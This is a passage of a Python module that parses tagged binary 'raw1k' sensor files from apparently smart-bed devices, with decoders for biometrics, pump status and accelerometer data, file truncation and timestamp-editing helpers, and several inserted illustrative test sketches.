Return packet parser for tag \"\"\"\n # yapf: disable\n packet_parsers = {\n get_tag_id(\"TAG_AVG_RAW_DATA\", tags): avg_raw_data,\n get_tag_id(\"TAG_PROCESSED_AVG_THRESHOLD_DATA\", tags): processed_avg_threshold_data,\n get_tag_id(\"TAG_PROCESSED_PAD_ANGLE\", tags): processed_pad_angle,\n get_tag_id(\"TAG_PROCESSED_PRESENCE\", tags): processed_presence,\n get_tag_id(\"TAG_DEVICE_COMMAND\", tags): device_command,\n get_tag_id(\"TAG_PUMP_STATUS\", tags): pump_status,\n get_tag_id(\"TAG_PUMP_STATUS_2\", tags): pump_status_2,\n get_tag_id(\"TAG_BIOMETRICS\", tags): biometrics,\n get_tag_id(\"TAG_PROCESSED_DRIFT\", tags): processed_drift,\n get_tag_id(\"TAG_PROCESSED_SNR\", tags): processed_snr,\n get_tag_id(\"TAG_ALGO_INIT\", tags): algo_init,\n get_tag_id(\"TAG_PROCESSED_DATA\", tags): processed_data,\n get_tag_id(\"TAG_SMART_ALARM\", tags): smart_alarm,\n get_tag_id(\"TAG_XPORT_RAW_DATA_FOOTER\", tags): xport_raw_data_footer,\n get_tag_id(\"TAG_PROCESSED_ALERT\", tags): processed_alert,\n get_tag_id(\"TAG_ALGO_VERSION\", tags): algo_version,\n get_tag_id(\"TAG_OUT_BYEDGEDETECT\", tags): out_byedgedetect,\n get_tag_id(\"TAG_ALL_FFT_POWER\", tags): all_fft_power,\n get_tag_id(\"TAG_A2D_OFFSET\", tags): a2d_offset,\n get_tag_id(\"TAG_INFO_FOR_ALGO\", tags): info_for_algo,\n get_tag_id(\"TAG_DSP_SEQ_NUM\", tags): dsp_seq_number,\n get_tag_id(\"TAG_RAWDATA_SEQ_NUM\", tags): rawdata_seq_number,\n get_tag_id(\"TAG_RDP_SEQ_NUM\", tags): rdp_seq_num,\n get_tag_id(\"TAG_RDP_VERSION\", tags): rdp_version,\n get_tag_id(\"TAG_DSP_TIMESTAMP\", tags): dsp_timestamp,\n get_tag_id(\"TAG_RAWDATA_TIMESTAMP\", tags): rawdata_timestamp,\n get_tag_id(\"TAG_DEVICE_ID\", tags): device_id,\n get_tag_id(\"TAG_USER_ID\", tags): user_id,\n get_tag_id(\"TAG_START_TIME\", tags): parse_start_time,\n get_tag_id(\"TAG_END_TIME\", tags): parse_end_time,\n get_tag_id(\"TAG_A2D_N_CHANNELS\", tags): a2d_channels,\n get_tag_id(\"TAG_A2D_SAMPLES_CH\", tags): a2d_samples_channel,\n get_tag_id(\"TAG_A2D_SAMPLE_PERIOD\", tags): a2d_sample_period,\n get_tag_id(\"TAG_DEVICE_CONFIG\", tags): device_config,\n get_tag_id(\"TAG_TIME_ZONE\", tags): time_zone,\n get_tag_id(\"TAG_IS_COMPRESSED\", tags): is_compressed,\n get_tag_id(\"TAG_HARDWARE_VER\", tags): hardware_version,\n get_tag_id(\"TAG_HEADER_ALGO_VERSION\", tags): header_algo_version,\n get_tag_id(\"TAG_HEADER_ATM_PRESSURE_OFFSET\", tags): header_atm_pressure_offset,\n get_tag_id(\"TAG_HEADER_ALGO_RUNNINGON\", tags): header_algo_running_on,\n get_tag_id(\"TAG_HEADER_INFO_FOR_ALGO\", tags): header_info_for_algo,\n get_tag_id(\"TAG_LAST_PACKET_POSITION\", tags): last_packet_position,\n get_tag_id(\"TAG_A2D_CH_DATA_32\", tags): a2d_ch_data_32,\n get_tag_id(\"TAG_SENSOR_VERSION\", tags): sensor_version,\n get_tag_id(\"TAG_ACCEL_XYZ\", tags): accel_xyz,\n get_tag_id(\"TAG_IW_STATS_QUAL\", tags): iw_stats_qual,\n get_tag_id(\"TAG_DEVICE_STATUS\", tags): device_status,\n get_tag_id(\"TAG_SENSOR_SER_NO\", tags): sensor_ser_no,\n get_tag_id(\"TAG_HRV\", tags): hrv,\n get_tag_id(\"TAG_BED_THERMAL_SETTINGS\", tags): bed_thermal_settings\n }\n # yapf: enable\n return packet_parsers\n\n\ndef get_tag_id(tag_name, tags, tag_not_found=-1):\n \"\"\" Get the tag_id given a tag name \"\"\"\n return tags.get(tag_name, {}).get(\"tag\", tag_not_found)\n\n\ndef parse_file_header(file, tags, packet_parsers, filter_input):\n \"\"\" Parse raw1k file header \"\"\"\n m_file_version = read_byte(file)\n m_endian = read_byte(file)\n m_last_packet_p1 = read_long(file)\n m_last_packet_p2 = read_long(file)\n 
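# ----------------------------------------------------------------------
# Illustrative sketch with made-up tag ids (the real ids come from the
# external tags definition passed in; not part of the original record):
# how get_tag_id and the parser lookup cooperate, including the
# default_parser fallback for unknown tags.
_toy_tags = {"TAG_DEVICE_ID": {"tag": 7}}
assert _toy_tags.get("TAG_DEVICE_ID", {}).get("tag", -1) == 7   # get_tag_id
assert _toy_tags.get("TAG_MISSING", {}).get("tag", -1) == -1    # not found

_toy_parsers = {7: lambda **kw: {"parsed": True}}
_fallback = lambda **kw: {"skipped": True}
assert _toy_parsers.get(7, _fallback)() == {"parsed": True}     # known tag
assert _toy_parsers.get(99, _fallback)() == {"skipped": True}   # default path
# ----------------------------------------------------------------------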
m_eof1 = read_long(file)\n m_eof2 = read_long(file)\n header = {\n \"m_file_version\": m_file_version,\n \"m_endian\": m_endian,\n \"m_last_packet_p1\": m_last_packet_p1,\n \"m_last_packet_p2\": m_last_packet_p2,\n \"m_eof1\": m_eof1,\n \"m_eof2\": m_eof2\n }\n tag_lookup_dict = create_tag_lookup_dict(tags)\n repeat_tags = {}\n for tag_id in packet_tag_ids(file, tags):\n tag_name = tag_lookup_dict.get(tag_id, UNSUPPORTED)\n packet_parser = packet_parsers.get(tag_id, default_parser)\n if tag_name in header:\n repeat_tags[tag_id] = repeat_tags.get(tag_id, 0) + 1\n tag_name = \"{}-{}\".format(tag_name, repeat_tags[tag_id])\n\n parsed_tag = parse_tag(file, tag_id, packet_parser, packed=True)\n if filter_input and tag_name == UNSUPPORTED:\n continue\n header[tag_name] = parsed_tag\n return header\n\n\ndef avg_raw_data(**kwargs):\n \"\"\" Parse average raw data \"\"\"\n samples = int(kwargs[\"byte_length\"] / 4)\n m_avg_raw_data = []\n for _ in itertools.repeat(None, samples):\n m_avg_raw_data.append(read_int(kwargs[\"file\"]))\n return {\n 'tag': kwargs[\"tag\"],\n 'samples': samples,\n 'm_avg_raw_data': m_avg_raw_data\n }\n\n\ndef processed_avg_threshold_data(**kwargs):\n \"\"\" Parse processed average threshold data \"\"\"\n samples = int(kwargs[\"byte_length\"] / 4)\n m_avg_threshold_data = []\n for _ in itertools.repeat(None, samples):\n m_avg_threshold_data.append(read_int(kwargs[\"file\"]))\n return {\n 'tag': kwargs[\"tag\"],\n 'samples': samples,\n 'm_avg_threshold_data': m_avg_threshold_data\n }\n\n\ndef processed_pad_angle(**kwargs):\n \"\"\" Parse processed pad angle \"\"\"\n m_accel_angle = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_accel_angle': m_accel_angle}\n\n\ndef processed_presence(**kwargs):\n \"\"\" Parse processed presence \"\"\"\n m_is_in_bed = read_byte(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_is_in_bed': m_is_in_bed}\n\n\ndef device_command(**kwargs):\n \"\"\" Parse device command\"\"\"\n m_device_command = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_device_command': m_device_command}\n\n\ndef pump_status(**kwargs):\n \"\"\" Parse pump status \"\"\"\n m_serial = read_int(kwargs[\"file\"])\n m_pump_status = read_byte(kwargs[\"file\"])\n m_foundation_status = read_byte(kwargs[\"file\"])\n m_sleep_number = read_byte(kwargs[\"file\"])\n skip_bytes(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_pump_status': m_pump_status,\n 'm_foundation_status': m_foundation_status,\n 'm_sleep_number': m_sleep_number,\n 'm_serial': m_serial\n }\n\n\ndef pump_status_2(**kwargs):\n \"\"\" Parse pump status 2 \"\"\"\n m_serial = read_int(kwargs[\"file\"])\n m_pump_status = read_byte(kwargs[\"file\"])\n m_foundation_status = read_byte(kwargs[\"file\"])\n m_sleep_number = read_byte(kwargs[\"file\"])\n m_foot_angle = read_byte(kwargs[\"file\"])\n m_head_angle = read_byte(kwargs[\"file\"])\n skip_bytes(kwargs[\"file\"], 3)\n return {\n 'tag': kwargs[\"tag\"],\n 'm_pump_status': m_pump_status,\n 'm_foundation_status': m_foundation_status,\n 'm_sleep_number': m_sleep_number,\n 'm_foot_angle': m_foot_angle,\n 'm_head_angle': m_head_angle,\n 'm_serial': m_serial\n }\n\n\ndef biometrics(**kwargs):\n \"\"\" Parse biometrics \"\"\"\n m_heart_rate = read_byte(kwargs[\"file\"])\n m_respiration_rate = read_byte(kwargs[\"file\"])\n m_figure_of_merit = read_long(kwargs[\"file\"])\n skip_bytes(kwargs[\"file\"], 2)\n return {\n 'tag': kwargs[\"tag\"],\n 'm_heart_rate': m_heart_rate,\n 'm_respiration_rate': m_respiration_rate,\n 
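# ----------------------------------------------------------------------
# Illustrative sketch (standalone, toy data; not part of the original
# record): the duplicate-tag renaming in parse_file_header above, which
# suffixes repeated header tags "NAME-1", "NAME-2", ... instead of
# silently overwriting earlier values.
header, repeat_tags = {}, {}
for tag_id, tag_name in [(3, "TAG_START_TIME"), (3, "TAG_START_TIME")]:
    if tag_name in header:
        repeat_tags[tag_id] = repeat_tags.get(tag_id, 0) + 1
        tag_name = "{}-{}".format(tag_name, repeat_tags[tag_id])
    header[tag_name] = {"tag": tag_id}
assert sorted(header) == ["TAG_START_TIME", "TAG_START_TIME-1"]
# ----------------------------------------------------------------------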
'm_figure_of_merit': m_figure_of_merit\n    }\n\n\ndef processed_drift(**kwargs):\n    \"\"\" Parse processed drift \"\"\"\n    m_drift = read_int(kwargs[\"file\"])\n    return {'tag': kwargs[\"tag\"], 'm_drift': m_drift}\n\n\ndef processed_snr(**kwargs):\n    \"\"\" Parse processed signal to noise ratio \"\"\"\n    m_snr = read_int(kwargs[\"file\"])\n    return {'tag': kwargs[\"tag\"], 'm_snr': m_snr}\n\n\ndef algo_init(**kwargs):\n    \"\"\" Parse algorithm initialization \"\"\"\n    if kwargs[\"byte_length\"]:\n        skip_bytes(kwargs[\"file\"], kwargs[\"byte_length\"])\n    return {'tag': kwargs[\"tag\"], 'm_is_algo_init': True}\n\n\ndef processed_data(**kwargs):\n    \"\"\" Parse processed data \"\"\"\n    m_version = read_int(kwargs[\"file\"])\n    packet = {'tag': kwargs[\"tag\"]}\n    if m_version == 3:\n        packet['m_snr'] = read_int(kwargs[\"file\"])\n        packet['m_drift'] = read_int(kwargs[\"file\"])\n        packet['m_dyy_sum'] = read_int(kwargs[\"file\"])\n        packet['m_area_2_to_5Hz'] = read_int(kwargs[\"file\"])\n        packet['m_area_10_to_15Hz'] = read_int(kwargs[\"file\"])\n        packet['m_area_5_to_10Hz'] = read_int(kwargs[\"file\"])\n        packet['m_mse'] = read_int(kwargs[\"file\"])\n        packet['m_sum_diff_ac'] = read_int(kwargs[\"file\"])\n        packet['m_threshold_from_centroid'] = read_int(kwargs[\"file\"])\n        packet['m_on_off_from_delta_minus_drift'] = read_int(kwargs[\"file\"])\n        packet['m_delayed_on_off_by_fft_difference'] = read_int(kwargs[\"file\"])\n        packet['m_armed_timer_for_auto_correct'] = read_int(kwargs[\"file\"])\n        packet['m_on_off_from_pressure'] = read_int(kwargs[\"file\"])\n        if kwargs[\"byte_length\"] == 66:\n            packet['m_ra_status'] = read_byte(kwargs[\"file\"])\n            packet['m_processed_pressure'] = read_int(kwargs[\"file\"])\n            packet['m_fw_level'] = read_byte(kwargs[\"file\"])\n            packet['m_fast_presence'] = read_byte(kwargs[\"file\"])\n            packet['m_snore_presence'] = read_byte(kwargs[\"file\"])\n            packet['m_snore_level'] = read_short(kwargs[\"file\"])\n    else:\n        skip_bytes(kwargs[\"file\"], kwargs[\"byte_length\"] - 4)\n    return packet\n\n\ndef smart_alarm(**kwargs):\n    \"\"\" Parse smart alarm \"\"\"\n    m_smart_alarm_seq_num = read_int(kwargs[\"file\"])\n    return {\n        'tag': kwargs[\"tag\"],\n        'm_smart_alarm_seq_num': m_smart_alarm_seq_num\n    }\n\n\ndef xport_raw_data_footer(**kwargs):\n    \"\"\" Parse xport raw data footer \"\"\"\n    packet = {\n        'tag': kwargs[\"tag\"],\n        'm_smart_alarm_countdown_timer': read_short(kwargs[\"file\"])\n    }\n    if kwargs[\"byte_length\"] >= 3:\n        packet['m_do_fast_presence'] = read_boolean(kwargs[\"file\"])\n    if kwargs[\"byte_length\"] >= 4:\n        packet['m_snore_enabled'] = read_byte(kwargs[\"file\"])\n    return packet\n\n\ndef processed_alert(**kwargs):\n    \"\"\" Parse processed alert\"\"\"\n    m_alert = read_int(kwargs[\"file\"])\n    return {'tag': kwargs[\"tag\"], 'm_alert': m_alert}\n\n\ndef algo_version(**kwargs):\n    \"\"\" Parse algo version \"\"\"\n    m_algo_version = read_int(kwargs[\"file\"])\n    m_algo_running_on = read_int(kwargs[\"file\"])\n    return {\n        'tag': kwargs[\"tag\"],\n        'm_algo_version': m_algo_version,\n        'm_algo_running_on': m_algo_running_on\n    }\n\n\ndef out_byedgedetect(**kwargs):\n    \"\"\" Parse out by edge detect \"\"\"\n    m_out_by_edge_detect = read_int(kwargs[\"file\"])\n    return {'tag': kwargs[\"tag\"], 'm_out_by_edge_detect': m_out_by_edge_detect}\n\n\ndef all_fft_power(**kwargs):\n    \"\"\" Parse all fft power \"\"\"\n    m_all_fft_power = read_int(kwargs[\"file\"])\n    return {'tag': kwargs[\"tag\"], 'm_all_fft_power': m_all_fft_power}\n\n\ndef a2d_offset(**kwargs):\n    \"\"\" Parse a2d offset \"\"\"\n    
m_atm_pressure_offset = read_int(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_atm_pressure_offset': m_atm_pressure_offset\n }\n\n\ndef info_for_algo(**kwargs):\n \"\"\" Parse information for algo \"\"\"\n m_birth_year = read_int(kwargs[\"file\"])\n m_height = read_short(kwargs[\"file\"])\n m_weight = read_short(kwargs[\"file\"])\n m_bed_type = read_byte(kwargs[\"file\"])\n m_person_type = read_byte(kwargs[\"file\"])\n m_a2d_mode = read_byte(kwargs[\"file\"])\n m_chamber_type = read_byte(kwargs[\"file\"])\n m_head_angle_from_wedge = read_byte(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_birth_year': m_birth_year,\n 'm_height': m_height,\n 'm_weight': m_weight,\n 'm_bed_type': m_bed_type,\n 'm_person_type': m_person_type,\n 'm_a2d_mode': m_a2d_mode,\n 'm_chamber_type': m_chamber_type,\n 'm_head_angle_from_wedge': m_head_angle_from_wedge\n }\n\n\ndef dsp_seq_number(**kwargs):\n \"\"\" Parse DSP sequence number \"\"\"\n m_seq_number_dsp = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_seq_number_dsp': m_seq_number_dsp}\n\n\ndef rawdata_seq_number(**kwargs):\n \"\"\" Parse Raw Data sequence number \"\"\"\n m_seq_number_raw = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_seq_number_raw': m_seq_number_raw}\n\n\ndef rdp_seq_num(**kwargs):\n \"\"\" Parse RDP sequence number \"\"\"\n m_seq_number = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_seq_number': m_seq_number}\n\n\ndef rdp_version(**kwargs):\n \"\"\" Parse RDP version \"\"\"\n m_rdp_version = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_rdp_version': m_rdp_version}\n\n\ndef dsp_timestamp(**kwargs):\n \"\"\" Parse DSP timestamp \"\"\"\n m_time_stamp_dsp = read_long(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_time_stamp_dsp': m_time_stamp_dsp}\n\n\ndef rawdata_timestamp(**kwargs):\n \"\"\" Parse Raw Data Timestamp \"\"\"\n m_time_stamp_raw = read_long(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_time_stamp_raw': m_time_stamp_raw}\n\n\ndef device_id(**kwargs):\n \"\"\" Parse Device ID \"\"\"\n m_device_id = read_long(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_device_id': m_device_id}\n\n\ndef user_id(**kwargs):\n \"\"\" Parse User ID \"\"\"\n m_user_id = read_long(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_user_id': m_user_id}\n\n\ndef parse_start_time(**kwargs):\n \"\"\" Parse Start Time \"\"\"\n m_start_time = read_long(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_start_time': m_start_time}\n\n\ndef parse_end_time(**kwargs):\n \"\"\" Parse End Time \"\"\"\n m_end_time = read_long(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_end_time': m_end_time}\n\n\ndef a2d_channels(**kwargs):\n \"\"\" Parse Number of A2D Channels \"\"\"\n m_a2d_channels = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_a2d_channels': m_a2d_channels}\n\n\ndef a2d_samples_channel(**kwargs):\n \"\"\" Parse A2D samples channel \"\"\"\n m_a2d_samples_ch = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_a2d_samples_ch': m_a2d_samples_ch}\n\n\ndef a2d_sample_period(**kwargs):\n \"\"\" Parse A2D sample period \"\"\"\n m_a2d_sample_period = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_a2d_sample_period': m_a2d_sample_period}\n\n\ndef device_config(**kwargs):\n \"\"\" Parse Device Configuration \"\"\"\n m_device_config = read_short(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_device_config': m_device_config}\n\n\ndef time_zone(**kwargs):\n \"\"\" Parse time 
zone \"\"\"\n m_time_zone = read_string(kwargs[\"file\"], kwargs[\"byte_length\"])\n return {'tag': kwargs[\"tag\"], 'm_time_zone': m_time_zone}\n\n\ndef is_compressed(**kwargs):\n \"\"\" Parse is compressed \"\"\"\n m_is_compressed = read_byte(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_is_compressed': m_is_compressed}\n\n\ndef hardware_version(**kwargs):\n \"\"\" Parse Hardware Version \"\"\"\n m_hardware_version = read_int(kwargs[\"file\"])\n return {'tag': kwargs[\"tag\"], 'm_hardware_version': m_hardware_version}\n\n\ndef header_algo_version(**kwargs):\n \"\"\" Parse header algorithm version \"\"\"\n m_header_algo_version = read_int(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_header_algo_version': m_header_algo_version\n }\n\n\ndef header_algo_running_on(**kwargs):\n \"\"\" Parse header algorithm running on \"\"\"\n m_header_algo_running_on = read_int(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_header_algo_running_on': m_header_algo_running_on\n }\n\n\ndef header_atm_pressure_offset(**kwargs):\n \"\"\" Parse header atmospheric pressure offset \"\"\"\n m_header_atm_pressure_offset = read_int(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_header_atm_pressure_offset': m_header_atm_pressure_offset\n }\n\n\ndef header_info_for_algo(**kwargs):\n \"\"\" Parse header information for algorithm \"\"\"\n m_birth_year = read_int(kwargs[\"file\"])\n m_height = read_short(kwargs[\"file\"])\n m_weight = read_short(kwargs[\"file\"])\n m_bed_type = read_byte(kwargs[\"file\"])\n m_person_type = read_byte(kwargs[\"file\"])\n m_a2d_mode = read_byte(kwargs[\"file\"])\n m_chamber_type = read_byte(kwargs[\"file\"])\n m_head_angle_from_wedge = read_byte(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_birth_year': m_birth_year,\n 'm_height': m_height,\n 'm_weight': m_weight,\n 'm_bed_type': m_bed_type,\n 'm_person_type': m_person_type,\n 'm_a2d_mode': m_a2d_mode,\n 'm_chamber_type': m_chamber_type,\n 'm_head_angle_from_wedge': m_head_angle_from_wedge\n }\n\n\ndef last_packet_position(**kwargs):\n \"\"\" Parse last packet position \"\"\"\n m_last_packet_position = read_long(kwargs[\"file\"])\n return {\n 'tag': kwargs[\"tag\"],\n 'm_last_packet_position': m_last_packet_position\n }\n\n\ndef a2d_ch_data_32(**kwargs):\n \"\"\" Parse A2D channel data \"\"\"\n m_channel_number = read_int(kwargs[\"file\"])\n m_number_of_samples = int((kwargs[\"byte_length\"] - 4) / 4)\n if m_number_of_samples <= 0:\n raise ValueError(\"TAG_A2D_CH_DATA_32: number of samples not set\")\n m_samples = []\n for _ in itertools.repeat(None, m_number_of_samples):\n m_samples.append(read_int(kwargs[\"file\"]))\n return {\n 'tag': kwargs[\"tag\"],\n 'm_channel_number': m_channel_number,\n 'm_number_of_samples': m_number_of_samples,\n 'm_samples': m_samples\n }\n\n\ndef sensor_version(**kwargs):\n \"\"\" Parse sensor version \"\"\"\n types = {\n 4: 'xyz',\n 256: 'SP1',\n 512: 'SP2',\n 257: 'GVB',\n 258: '360',\n -1: 'Unknown'\n }\n m_sensor_version = read_short(kwargs[\"file\"])\n if m_sensor_version in types:\n return {\n 'tag': kwargs[\"tag\"],\n 'm_sensor_version': m_sensor_version,\n 'name': types[m_sensor_version]\n }\n return {'tag': kwargs[\"tag\"], 'm_sensor_version': m_sensor_version}\n\n\ndef accel_xyz(**kwargs):\n \"\"\" Parse Accelerometer data \"\"\"\n accel_samples = int(kwargs[\"byte_length\"] / 4)\n samples = {}\n for sample in range(0, accel_samples):\n accel_sample = read_int(kwargs[\"file\"])\n accel_x = (accel_sample >> 20) & 0x03FF\n accel_y = 
(accel_sample >> 10) & 0x03FF\n        accel_z = (accel_sample >> 00) & 0x03FF\n        samples[sample] = {\n            \"accel_x\": accel_x,\n            \"accel_y\": accel_y,\n            \"accel_z\": accel_z,\n        }\n    return {\n        'tag': kwargs[\"tag\"],\n        'm_number_of_samples': accel_samples,\n        'samples': samples\n    }\n\n\ndef iw_stats_qual(**kwargs):\n    \"\"\" Parse wifi quality \"\"\"\n    m_wifi_quality = read_short(kwargs[\"file\"])\n    m_wifi_level = read_short(kwargs[\"file\"])\n    m_wifi_noise = read_short(kwargs[\"file\"])\n    m_set_wifi_updated = read_short(kwargs[\"file\"])\n    return {\n        'tag': kwargs[\"tag\"],\n        'm_wifi_quality': m_wifi_quality,\n        'm_wifi_level': m_wifi_level,\n        'm_wifi_noise': m_wifi_noise,\n        'm_set_wifi_updated': m_set_wifi_updated\n    }\n\n\ndef device_status(**kwargs):\n    \"\"\" Parse device status \"\"\"\n    fields = [\n        \"PS_PUMP_STATUS\", \"PS_FND_STATUS\", \"PS_SLEEP_NUMBER\", \"PS_FOOT_ANGLE\",\n        \"PS_HEAD_ANGLE\", \"PS_DUAL_TEMP_STATUS\", \"PS_DUAL_TEMP_BLOWER\",\n        \"PS_HEIDI_HEATER\", \"PS_HEIDI_FAN\", \"PS_HEIDI_DIRECTION\",\n        \"PS_HEIDI_TEMPERATURE\", \"PS_HEIDI_HEATER_NTS\", \"PS_HEIDI_FAN_NTS\",\n        \"PS_HEIDI_DIRECTION_NTS\", \"PS_HEIDI_TEMPERATURE_NTS\",\n        \"PS_HEIDI_MODE\", \"PS_HEIDI_MODE_NTS\"\n    ]\n    fields_index = read_byte(kwargs[\"file\"])\n    value = read_byte(kwargs[\"file\"])\n    if fields_index < len(fields):\n        return {'tag': kwargs[\"tag\"], fields[fields_index]: value}\n    return {'tag': kwargs[\"tag\"], 'field_index': fields_index, 'value': value}\n\n\ndef sensor_ser_no(**kwargs):\n    \"\"\" Parse sensor serial number \"\"\"\n    serial_numbers = {0: \"right\", 1: \"left\", 2: \"both\"}\n    serial_number = read_int(kwargs[\"file\"])\n    side = serial_numbers.get(serial_number, \"invalid\")\n    return {'tag': kwargs[\"tag\"], 'sensor_serial': serial_number, 'side': side}\n\n\ndef hrv(**kwargs):\n    \"\"\" Parse Heart Rate Variability \"\"\"\n    dsp_seq_numb = read_int(kwargs[\"file\"])\n    number_heart_beats = read_int(kwargs[\"file\"])\n    sum_of_b2b = read_int(kwargs[\"file\"])\n    sum_of_square_b2b = read_long(kwargs[\"file\"])\n    dsp_time_stamp_gmt = read_long(kwargs[\"file\"])\n    sensor_serial_number = read_int(kwargs[\"file\"])\n    return {\n        'tag': kwargs[\"tag\"],\n        'dsp_seq_number': dsp_seq_numb,\n        'number_heart_beats': number_heart_beats,\n        'sum_of_b2b': sum_of_b2b,\n        'sum_of_square_b2b': sum_of_square_b2b,\n        'dsp_time_stamp_gmt': dsp_time_stamp_gmt,\n        'sensor_serial_number': sensor_serial_number\n    }\n\n\ndef bed_thermal_settings(**kwargs):\n    \"\"\" Parse Temperature Data \"\"\"\n    serial_number = read_int(kwargs[\"file\"])\n    index = read_byte(kwargs[\"file\"])\n    value = read_short(kwargs[\"file\"])\n    reason = read_byte(kwargs[\"file\"])\n    timestamp = read_long(kwargs[\"file\"])\n    return {\n        'tag': kwargs[\"tag\"],\n        'serial_number': serial_number,\n        'index': index,\n        'value': value,\n        'reason': reason,\n        'timestamp': timestamp\n    }\n\n\ndef default_parser(**kwargs):\n    \"\"\" Skip unsupported tags \"\"\"\n    skip_bytes(kwargs[\"file\"], kwargs[\"byte_length\"])\n    return {\n        'tag': kwargs[\"tag\"],\n        'skipped': True,\n        'bytes': kwargs[\"byte_length\"]\n    }\n\n\ndef filter_tags(tags, args):\n    \"\"\" Filter the tags needed for further parsing \"\"\"\n    return {k: v for k, v in tags.items() if str(v['tag']) in args.filter}\n\n\n##################\n# FILE MODIFIERS #\n##################\n\n\ndef truncate_raw1k(end_of_header, start_offset, end_offset, output_file_path):\n    \"\"\" Truncate a raw1k file \"\"\"\n    with open(output_file_path, \"r+b\") as out_file:\n        LOG.info(\"Truncating to specified times.\")\n        
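# ----------------------------------------------------------------------
# Illustrative sketch (standalone, hypothetical axis values; not part of
# the original record): accel_xyz above unpacks three 10-bit fields from
# one 32-bit sample; packing and unpacking round-trip exactly.
x, y, z = 513, 17, 1023                  # any values in 0..1023
sample = (x << 20) | (y << 10) | z
assert (sample >> 20) & 0x03FF == x
assert (sample >> 10) & 0x03FF == y
assert (sample >> 0) & 0x03FF == z
# ----------------------------------------------------------------------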
out_file.truncate(end_offset)\n out_file.seek(start_offset)\n section = out_file.read()\n out_file.truncate(end_of_header)\n out_file.seek(end_of_header)\n out_file.write(section)\n\n\ndef update_timestamp(output_file, location, time_offset):\n \"\"\" Update the time stamp of a file \"\"\"\n output_file.seek(location)\n new_time_stamp = read_long(output_file) + time_offset\n output_file.seek(location)\n write_long(output_file, new_time_stamp)\n\n\ndef update_side(output_file, location, value):\n \"\"\" Update side \"\"\"\n output_file.seek(location)\n write_int(output_file, value)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "Sord27/ttt", "sub_path": "device/python/DEVICE-227/raw1k.py", "file_name": "raw1k.py", "file_ext": "py", "file_size_in_byte": 45380, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 20, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 22, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 46, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 65, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 75, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 76, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 84, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 114, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 134, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 186, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 186, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 188, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 195, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 195, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 197, "usage_type": "call"}, {"api_name": "logging.WARNING", "line_number": 204, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 206, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 208, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 220, "usage_type": "call"}, {"api_name": "json.load", "line_number": 226, "usage_type": "call"}, {"api_name": "progress_bar.InitBarForInfile", "line_number": 236, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 253, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 253, "usage_type": "call"}, {"api_name": "progress_bar.InitBar", "line_number": 256, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 279, "usage_type": "call"}, {"api_name": "logging.WARNING", "line_number": 314, "usage_type": "attribute"}, {"api_name": "progress_bar.InitBarForInfile", "line_number": 318, "usage_type": "call"}, {"api_name": "struct.error", "line_number": 421, "usage_type": "attribute"}, {"api_name": "gzip.decompress", "line_number": 452, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 454, "usage_type": "call"}, {"api_name": "progress_bar.InitBar", "line_number": 472, "usage_type": "call"}, {"api_name": "json.dumps", 
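# ----------------------------------------------------------------------
# Illustrative sketch (standalone; tempfile is only for the demo and is
# not used by the original): the seek/read/seek/write pattern behind
# update_timestamp above, patching an 8-byte value in place at a known
# offset.
import struct
import tempfile

with tempfile.TemporaryFile() as fh:
    fh.write(struct.pack("q", 1000))                    # original timestamp
    fh.seek(0)
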